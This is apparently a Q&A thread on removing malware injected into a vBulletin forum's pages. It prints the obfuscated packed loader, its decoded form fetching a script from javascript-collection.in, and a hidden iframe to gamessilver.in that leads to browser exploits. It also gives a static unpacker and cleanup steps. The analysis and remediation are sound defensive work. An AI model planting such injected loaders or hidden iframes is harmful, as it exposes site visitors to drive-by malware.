
Remove Malware from Website

My website, 3dsforums.com, has been marked as an attack site for containing malware. According to Google Webmaster Tools, this is the suspected code that has been injected onto every page:

<script>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 1=4.5(\'6\');1.7=\'8://9-a.b/ c.d.1\';3 2=4.e(\'2\')[0];2.f(1);',16,16,'|js|head|var|document|createElement|script|src|http|javascript|collection|in|jquery|compatibility|getElementsByTagName|appendChild'.split('|'),0,{}))</script>

As such, I have two questions:

Is this actually the offending code?

And how do I remove it?

I can't seem to find it via the templates in vBulletin, or through phpmyadmin, so I'm lost as to what I should do.

Thanks for any help.

JS Beautifier decompresses that as this:

var js = document.createElement('script');
js.src = 'http://javascript-collection.in/ jquery.compatibility.js';
var head = document.getElementsByTagName('head')[0];
head.appendChild(js);

It looks suspicious (who would obfuscate that?), so I would assume that yes, it's the problem, and you should remove it.

Edit: Now that the malicious site is back up, I can analyze the rest: it appears to add an iframe:

var iframe = document.createElement('iframe');
iframe.src = 'http://gamessilver.in/in.cgi?walter';
iframe.width = 0;
iframe.height = 0;
iframe.vspace = 0;
iframe.hspace = 0;
iframe.frameborder = 0;
iframe.marginheight = 0;
iframe.marginwidth = 0;
var head = document.getElementsByTagName('head')[0];
head.appendChild(iframe);

Kind of strange to be appending it to the head.

The in.cgi script appears to redirect to Google if the User-Agent is not very exploitable. Otherwise, it redirects to another malicious website.

It continues branching off with many iframes. Many of them do nothing (although at that point, I was only trying the User-Agent for MSIE 6 on WinXP), but I eventually wound up with two Java applets. When I decompiled them, all the names were mangled and I didn't bother to try to figure out what it's doing.
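The answer above reads the payload by running it through JS Beautifier. As an added example (not code from the question or from any answer above), here is a static unpacker for that `eval(function(p,a,c,k,e,r){...})` packer: it parses the four arguments out of the call and replays the decoder's word substitution on strings, so nothing is ever handed to `eval()`. The packed sample is the one quoted in the question, copied as it appears there (including the space inside the URL); the function names and the radix-62 handling are my own additions.

```javascript
// Added example: a static unpacker for Dean Edwards-style "p,a,c,k,e,r"
// packed JavaScript. Nothing is executed; the packed call is parsed with a
// regex and the substitution table is rebuilt and applied to the payload.

// Copied from the question. String.raw keeps every backslash as written.
const PACKED_FROM_QUESTION = String.raw`<script>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 1=4.5(\'6\');1.7=\'8://9-a.b/ c.d.1\';3 2=4.e(\'2\')[0];2.f(1);',16,16,'|js|head|var|document|createElement|script|src|http|javascript|collection|in|jquery|compatibility|getElementsByTagName|appendChild'.split('|'),0,{}))</script>`;

// Matches the call at the end of the packer: }('payload', radix, count, 'k|e|y|s'.split('|')
// The payload and keyword strings may contain escaped quotes, hence (?:\\.|[^'\\])*.
const CALL_RE = /\}\s*\(\s*'((?:\\.|[^'\\])*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:\\.|[^'\\])*)'\s*\.split\(\s*'\|'\s*\)/;

// Minimal JS string-literal unescape (\' \\ \/ \n \t \r \xHH \uHHHH); enough for packed payloads.
function unescapeJsString(s) {
  let out = '';
  for (let i = 0; i < s.length; i++) {
    const ch = s[i];
    if (ch !== '\\') { out += ch; continue; }
    const next = s[++i];
    switch (next) {
      case 'n': out += '\n'; break;
      case 't': out += '\t'; break;
      case 'r': out += '\r'; break;
      case 'x': out += String.fromCharCode(parseInt(s.substr(i + 1, 2), 16)); i += 2; break;
      case 'u': out += String.fromCharCode(parseInt(s.substr(i + 1, 4), 16)); i += 4; break;
      default: out += next; // covers \' \\ \/ and anything else
    }
  }
  return out;
}

// Name the packer gives symbol i. For radix <= 36 it is i.toString(radix)
// (the sample uses 16, so symbols are hex digits). For larger radixes the
// packer spells digits 36..61 as A..Z; reproduced here so radix-62 packs unpack too.
function symbolFor(i, radix) {
  if (radix <= 36) return i.toString(radix);
  const digit = (d) => (d > 35 ? String.fromCharCode(d + 29) : d.toString(36));
  return (i < radix ? '' : symbolFor(Math.floor(i / radix), radix)) + digit(i % radix);
}

// Rebuild the symbol -> word table and substitute every \w+ token of the payload.
// An empty keyword slot means that symbol was never renamed, so it maps to itself.
function unpackOnce(payload, radix, count, keywords) {
  const dict = new Map();
  for (let i = 0; i < count; i++) {
    const sym = symbolFor(i, radix);
    dict.set(sym, keywords[i] || sym);
  }
  return payload.replace(/\b\w+\b/g, (w) => (dict.has(w) ? dict.get(w) : w));
}

// Locate the packer call in arbitrary source and unpack it; null if none found.
function unpackPacked(source) {
  const m = CALL_RE.exec(source);
  if (!m) return null;
  return unpackOnce(unescapeJsString(m[1]), parseInt(m[2], 10), parseInt(m[3], 10), m[4].split('|'));
}

// Packers are sometimes nested; keep unpacking until no packer call remains.
function unpackAll(source, maxDepth = 5) {
  let current = source;
  for (let depth = 0; depth < maxDepth; depth++) {
    const next = unpackPacked(current);
    if (next === null) break;
    current = next;
  }
  return current;
}

console.log(unpackAll(PACKED_FROM_QUESTION));
```

The output is the single line that JS Beautifier spreads over four lines above: a `script` element whose `src` points at the remote `jquery.compatibility.js` loader, appended to `head`. Because the unpacker never evaluates anything, the same function can be pointed at a captured `jquery.compatibility.js` or at the page source of other infected sites to pull out the next-stage URL without touching a browser.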

The first thing you should do is change your FTP or SSH login and password.

The above looks like an FTP exploit. It looks like either you are out of date with your OS updates or you are letting the whole world write to your files.

Even though you overwrite your files, the problem may come back. So I strongly suggest you check the following:

  1. Note the last modified date of the files in question.
     1a. Immediately remove write access to all the site's files. Do this as a precaution just to be safe from a similar attack.
     1b. Overwrite your files from backup.
  2. Check your FTP, SSH and access logs to see if you can find something fishy.
  3. Check whether Apache, or whatever web server you are using, has a pending update.
  4. Check the file permissions for your website.
  5. Change your FTP password immediately.

Advice: change your passwords to something strong, e.g. KLioof*(&^paswl

It was actually hiding in includes/functions.php on lines 6844 and 6845; the two lines were replacing </head> with their script+</head>.

Tough one to find and smart too.

I resolved this problem. You must find and delete the base64 function with the shady string in the site files. It decodes this script from the string.
